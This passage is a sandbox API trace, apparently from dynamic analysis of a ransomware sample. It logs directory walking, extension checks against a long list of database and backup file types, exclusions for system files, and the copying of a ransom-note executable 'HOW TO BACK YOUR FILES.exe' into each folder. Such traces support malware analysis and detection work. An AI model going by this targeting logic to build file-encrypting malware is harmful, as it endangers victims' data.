(lpString="accft") returned 5 [0039.796] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0039.796] lstrlenW (lpString="adb") returned 3 [0039.796] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.796] lstrlenW (lpString="adb") returned 3 [0039.796] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.796] lstrlenW (lpString="ade") returned 3 [0039.796] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0039.796] lstrlenW (lpString="adf") returned 3 [0039.796] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0039.796] lstrlenW (lpString="adn") returned 3 [0039.796] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0039.796] lstrlenW (lpString="adp") returned 3 [0039.796] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0039.796] lstrlenW (lpString="alf") returned 3 [0039.796] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0039.796] lstrlenW (lpString="ask") returned 3 [0039.796] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0039.796] lstrlenW (lpString="btr") returned 3 [0039.796] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0039.796] lstrlenW (lpString="cat") returned 3 [0039.796] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0039.796] lstrlenW (lpString="cdb") returned 3 [0039.797] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0039.797] lstrlenW (lpString="ckp") returned 3 [0039.797] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0039.797] lstrlenW (lpString="cma") returned 3 [0039.797] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0039.797] lstrlenW (lpString="cpd") returned 3 [0039.797] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0039.797] lstrlenW (lpString="dacpac") returned 6 [0039.797] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0039.797] lstrlenW (lpString="dad") returned 3 [0039.797] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0039.797] lstrlenW (lpString="dadiagrams") returned 10 [0039.797] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0039.797] lstrlenW (lpString="daschema") returned 8 [0039.797] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0039.797] lstrlenW (lpString="db-journal") returned 10 [0039.797] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0039.797] lstrlenW (lpString="db-shm") returned 6 [0039.797] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0039.797] lstrlenW (lpString="db-wal") returned 6 [0039.797] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0039.797] lstrlenW (lpString="dbc") returned 3 [0039.797] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0039.797] lstrlenW (lpString="dbs") returned 3 [0039.797] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0039.797] lstrlenW (lpString="dbt") returned 3 [0039.797] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0039.797] lstrlenW (lpString="dbv") returned 3 [0039.797] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0039.797] lstrlenW (lpString="dbx") returned 3 [0039.797] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0039.797] lstrlenW (lpString="dcb") returned 3 [0039.797] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0039.797] lstrlenW (lpString="dct") returned 3 [0039.797] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0039.797] lstrlenW (lpString="dcx") returned 3 [0039.798] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0039.798] lstrlenW (lpString="ddl") returned 3 [0039.798] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0039.798] lstrlenW (lpString="dlis") returned 4 [0039.798] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0039.798] lstrlenW (lpString="dp1") returned 3 [0039.798] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0039.798] lstrlenW (lpString="dqy") returned 3 [0039.798] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0039.798] lstrlenW (lpString="dsk") returned 3 [0039.798] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0039.798] lstrlenW (lpString="dsn") returned 3 [0039.798] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0039.798] lstrlenW (lpString="dtsx") returned 4 [0039.798] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0039.798] lstrlenW (lpString="dxl") returned 3 [0039.798] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0039.798] lstrlenW (lpString="eco") returned 3 [0039.798] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0039.798] lstrlenW (lpString="ecx") returned 3 [0039.798] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0039.798] lstrlenW (lpString="edb") returned 3 [0039.798] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0039.798] lstrlenW (lpString="epim") returned 4 [0039.798] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0039.798] lstrlenW (lpString="fcd") returned 3 [0039.798] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0039.798] lstrlenW (lpString="fdb") returned 3 [0039.798] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0039.798] lstrlenW (lpString="fic") returned 3 [0039.798] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0039.798] lstrlenW (lpString="flexolibrary") returned 12 [0039.798] lstrlenW (lpString="fm5") returned 3 [0039.798] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0039.799] lstrlenW (lpString="fmp") returned 3 [0039.799] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0039.799] lstrlenW (lpString="fmp12") returned 5 [0039.799] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0039.799] lstrlenW (lpString="fmpsl") returned 5 [0039.799] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0039.799] lstrlenW (lpString="fol") returned 3 [0039.799] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0039.799] lstrlenW (lpString="fp3") returned 3 [0039.799] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0039.799] lstrlenW (lpString="fp4") returned 3 [0039.799] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0039.799] lstrlenW (lpString="fp5") returned 3 [0039.799] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0039.799] lstrlenW (lpString="fp7") returned 3 [0039.799] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0039.799] lstrlenW (lpString="fpt") returned 3 [0039.799] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0039.799] lstrlenW (lpString="frm") returned 3 [0039.799] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0039.799] lstrlenW (lpString="gdb") returned 3 [0039.799] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.799] lstrlenW (lpString="gdb") returned 3 [0039.799] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.799] lstrlenW (lpString="grdb") returned 4 [0039.799] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0039.799] lstrlenW (lpString="gwi") returned 3 [0039.799] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0039.799] lstrlenW (lpString="hdb") returned 3 [0039.799] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0039.799] lstrlenW (lpString="his") returned 3 [0039.799] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0039.799] lstrlenW (lpString="ib") returned 2 [0039.799] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0039.799] lstrlenW (lpString="idb") returned 3 [0039.799] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0039.800] lstrlenW (lpString="ihx") returned 3 [0039.800] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0039.800] lstrlenW (lpString="itdb") returned 4 [0039.800] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0039.800] lstrlenW (lpString="itw") returned 3 [0039.800] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0039.800] lstrlenW (lpString="jet") returned 3 [0039.800] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0039.800] lstrlenW (lpString="jtx") returned 3 [0039.800] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0039.800] lstrlenW (lpString="kdb") returned 3 [0039.800] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0039.800] lstrlenW (lpString="kexi") returned 4 [0039.800] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0039.800] lstrlenW (lpString="kexic") returned 5 [0039.800] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0039.800] lstrlenW (lpString="kexis") returned 5 [0039.800] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0039.800] lstrlenW (lpString="lgc") returned 3 [0039.800] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0039.800] lstrlenW (lpString="lwx") returned 3 [0039.800] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0039.800] lstrlenW (lpString="maf") returned 3 [0039.800] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0039.800] lstrlenW (lpString="maq") returned 3 [0039.800] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0039.800] lstrlenW (lpString="mar") returned 3 [0039.800] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0039.800] lstrlenW (lpString="marshal") returned 7 [0039.800] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0039.800] lstrlenW (lpString="mas") returned 3 [0039.800] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0039.800] lstrlenW (lpString="mav") returned 3 [0039.800] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0039.800] lstrlenW (lpString="maw") returned 3 [0039.801] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0039.801] lstrlenW (lpString="mdbhtml") returned 7 [0039.801] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0039.801] lstrlenW (lpString="mdn") returned 3 [0039.801] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0039.801] lstrlenW (lpString="mdt") returned 3 [0039.801] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0039.801] lstrlenW (lpString="mfd") returned 3 [0039.801] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0039.801] lstrlenW (lpString="mpd") returned 3 [0039.801] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0039.801] lstrlenW (lpString="mrg") returned 3 [0039.801] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0039.801] lstrlenW (lpString="mud") returned 3 [0039.801] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0039.801] lstrlenW (lpString="mwb") returned 3 [0039.801] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0039.801] lstrlenW (lpString="myd") returned 3 [0039.801] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0039.801] lstrlenW (lpString="ndf") returned 3 [0039.801] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0039.801] lstrlenW (lpString="nnt") returned 3 [0039.801] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0039.801] lstrlenW (lpString="nrmlib") returned 6 [0039.801] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0039.801] lstrlenW (lpString="ns2") returned 3 [0039.801] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0039.801] lstrlenW (lpString="ns3") returned 3 [0039.801] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0039.801] lstrlenW (lpString="ns4") returned 3 [0039.801] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0039.801] lstrlenW (lpString="nsf") returned 3 [0039.801] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0039.801] lstrlenW (lpString="nv") returned 2 [0039.801] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0039.801] lstrlenW (lpString="nv2") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0039.802] lstrlenW (lpString="nwdb") returned 4 [0039.802] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0039.802] lstrlenW (lpString="nyf") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0039.802] lstrlenW (lpString="odb") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.802] lstrlenW (lpString="odb") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.802] lstrlenW (lpString="oqy") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0039.802] lstrlenW (lpString="ora") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0039.802] lstrlenW (lpString="orx") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0039.802] lstrlenW (lpString="owc") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0039.802] lstrlenW (lpString="p96") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0039.802] lstrlenW (lpString="p97") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0039.802] lstrlenW (lpString="pan") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0039.802] lstrlenW (lpString="pdb") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0039.802] lstrlenW (lpString="pdm") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0039.802] lstrlenW (lpString="pnz") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0039.802] lstrlenW (lpString="qry") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0039.802] lstrlenW (lpString="qvd") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0039.802] lstrlenW (lpString="rbf") returned 3 [0039.802] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0039.803] lstrlenW (lpString="rctd") returned 4 [0039.803] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0039.803] lstrlenW (lpString="rod") returned 3 [0039.803] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0039.803] lstrlenW (lpString="rodx") returned 4 [0039.803] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0039.803] lstrlenW (lpString="rpd") returned 3 [0039.803] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0039.803] lstrlenW (lpString="rsd") returned 3 [0039.803] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0039.803] lstrlenW (lpString="sas7bdat") returned 8 [0039.803] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0039.803] lstrlenW (lpString="sbf") returned 3 [0039.803] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0039.803] lstrlenW (lpString="scx") returned 3 [0039.803] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0039.803] lstrlenW (lpString="sdb") returned 3 [0039.803] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0039.803] lstrlenW (lpString="sdc") returned 3 [0039.803] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0039.803] lstrlenW (lpString="sdf") returned 3 [0039.803] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0039.803] lstrlenW (lpString="sis") returned 3 [0039.803] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0039.803] lstrlenW (lpString="spq") returned 3 [0039.803] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0039.803] lstrlenW (lpString="te") returned 2 [0039.803] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0039.803] lstrlenW (lpString="teacher") returned 7 [0039.803] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0039.803] lstrlenW (lpString="tmd") returned 3 [0039.803] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0039.803] lstrlenW (lpString="tps") returned 3 [0039.803] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0039.803] lstrlenW (lpString="trc") returned 3 [0039.804] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.804] lstrlenW (lpString="trc") returned 3 [0039.804] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.804] lstrlenW (lpString="trm") returned 3 [0039.804] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0039.804] lstrlenW (lpString="udb") returned 3 [0039.804] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0039.804] lstrlenW (lpString="udl") returned 3 [0039.804] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0039.804] lstrlenW (lpString="usr") returned 3 [0039.804] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0039.804] lstrlenW (lpString="v12") returned 3 [0039.804] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0039.804] lstrlenW (lpString="vis") returned 3 [0039.804] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0039.804] lstrlenW (lpString="vpd") returned 3 [0039.804] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0039.804] lstrlenW (lpString="vvv") returned 3 [0039.804] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0039.804] lstrlenW (lpString="wdb") returned 3 [0039.804] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0039.804] lstrlenW (lpString="wmdb") returned 4 [0039.804] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0039.804] lstrlenW (lpString="wrk") returned 3 [0039.804] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0039.804] lstrlenW (lpString="xdb") returned 3 [0039.804] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0039.804] lstrlenW (lpString="xld") returned 3 [0039.804] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0039.804] lstrlenW (lpString="xmlff") returned 5 [0039.804] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0039.804] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49627e40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0039.804] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0039.804] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 1 [0039.804] lstrcmpiW (lpString1="Sample Media", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.805] lstrcmpiW (lpString1="Sample Media", lpString2="aoldtz.exe") returned 1 [0039.805] lstrcmpiW (lpString1="Sample Media", lpString2=".") returned 1 [0039.805] lstrcmpiW (lpString1="Sample Media", lpString2="..") returned 1 [0039.805] lstrcmpiW (lpString1="Sample Media", lpString2="windows") returned -1 [0039.805] lstrcmpiW (lpString1="Sample Media", lpString2="bootmgr") returned 1 [0039.805] lstrcmpiW (lpString1="Sample Media", lpString2="temp") returned -1 [0039.805] lstrcmpiW (lpString1="Sample Media", lpString2="pagefile.sys") returned 1 [0039.805] lstrcmpiW (lpString1="Sample Media", lpString2="boot") returned 1 [0039.805] lstrcmpiW (lpString1="Sample Media", lpString2="ids.txt") returned 1 [0039.805] lstrcmpiW (lpString1="Sample Media", lpString2="ntuser.dat") returned 1 [0039.805] lstrcmpiW (lpString1="Sample Media", lpString2="perflogs") returned 1 [0039.805] lstrcmpiW (lpString1="Sample Media", lpString2="MSBuild") returned 1 [0039.805] lstrlenW (lpString="Sample Media") returned 12 [0039.805] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\desktop.ini") returned 39 [0039.805] lstrcpyW (in: lpString1=0x2e2e898, lpString2="Sample Media" | out: lpString1="Sample Media") returned="Sample Media" [0039.805] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media", dwFileAttributes=0x10) returned 1 [0039.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d22e0 [0039.806] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x52) returned 0x2c8fc8 [0039.806] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d22e8 | out: ListHead=0x2e77d0, ListEntry=0x2d22e8) returned 0x2d22c8 [0039.806] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 0 [0039.806] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0039.806] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d22e8 [0039.806] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Recorded TV\\Sample Media", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media") returned="C:\\Users\\Public\\Recorded TV\\Sample Media" [0039.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8fc8 | out: hHeap=0x2b0000) returned 1 [0039.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0039.806] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\Sample Media") returned 40 [0039.806] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Recorded TV\\Sample Media" | out: lpString1="C:\\Users\\Public\\Recorded TV\\Sample Media") returned="C:\\Users\\Public\\Recorded TV\\Sample Media" [0039.807] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.807] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\recorded tv\\sample media\\how to back your files.exe"), bFailIfExists=1) returned 1 [0039.823] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0039.823] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x49674100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49674100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0039.823] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.823] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0039.823] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0039.823] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x49674100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49674100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.823] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.823] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0039.823] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0039.823] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0039.823] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0xab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0039.824] lstrlenW (lpString="desktop.ini") returned 11 [0039.824] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\Sample Media\\*") returned 42 [0039.824] lstrcpyW (in: lpString1=0x2e2e8b2, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0039.824] lstrlenW (lpString="desktop.ini") returned 11 [0039.824] lstrlenW (lpString="Ares865") returned 7 [0039.824] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0039.824] lstrlenW (lpString=".dll") returned 4 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0039.824] lstrlenW (lpString=".lnk") returned 4 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0039.824] lstrlenW (lpString=".ini") returned 4 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0039.824] lstrlenW (lpString=".sys") returned 4 [0039.824] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0039.824] lstrlenW (lpString="desktop.ini") returned 11 [0039.824] lstrlenW (lpString="bak") returned 3 [0039.824] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0039.824] lstrlenW (lpString="ba_") returned 3 [0039.824] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0039.824] lstrlenW (lpString="dbb") returned 3 [0039.824] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0039.825] lstrlenW (lpString="vmdk") returned 4 [0039.825] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0039.825] lstrlenW 